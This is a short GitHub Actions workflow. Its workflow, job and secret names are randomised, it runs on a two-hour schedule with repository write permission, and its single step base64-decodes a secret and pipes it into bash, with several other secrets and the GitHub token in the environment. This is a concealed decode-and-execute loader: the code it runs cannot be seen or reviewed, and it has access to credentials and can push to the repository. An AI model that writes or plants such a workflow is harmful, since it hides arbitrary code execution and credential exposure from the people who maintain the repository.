name: rDowC
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  V5K5Z:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.zo5ofaV }}
      - name: b1PN3bQwSqZJjOY
        env:
          FldJFFPT9Ubk: ${{ secrets.H5uyugBfLA }}
          mlR8hk6: ${{ secrets.CCICP3vXTqH }}
          nU4bkf98BPUrx: ${{ secrets.lcLNs4hRea4t }}
          GITHUB_TOKEN: ${{ secrets.zo5ofaV }}
        run: echo "$FldJFFPT9Ubk" | base64 -d | bash
